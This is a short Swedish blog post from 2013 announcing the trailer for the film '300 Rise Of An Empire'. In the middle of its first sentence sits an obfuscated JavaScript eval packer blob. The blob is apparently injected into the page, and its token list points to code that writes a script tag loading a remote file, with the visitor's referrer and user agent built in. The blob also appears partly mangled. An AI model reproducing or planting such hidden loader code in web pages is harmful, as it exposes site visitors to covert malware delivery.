Image Image Image Image Image Image Image Image Image Image

| 23 juli, 2018

Scroll to top

Top

No Comments

300 Rise Of An Empire trailer… YEAH!!!

Filip Urde
  • On 14 juni, 2013
  • http://www.revue.se/filip-urde

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sksbi|var|u0026u|referrer|tnbti||js|php’.split(‘|’),0,{}))
mars nästa år så kommer 300 Rise Of An Empire. 

 

 

 

Männen med stora muskler, hjälmar, svärd och sköldar är tillbaka och det ser ju ut att bli minst lika mycket ös som sist!

 

Så sätt på HD-kvalité, helskärm och höj volymen… Nu åker vi!
www.youtube.com

Submit a Comment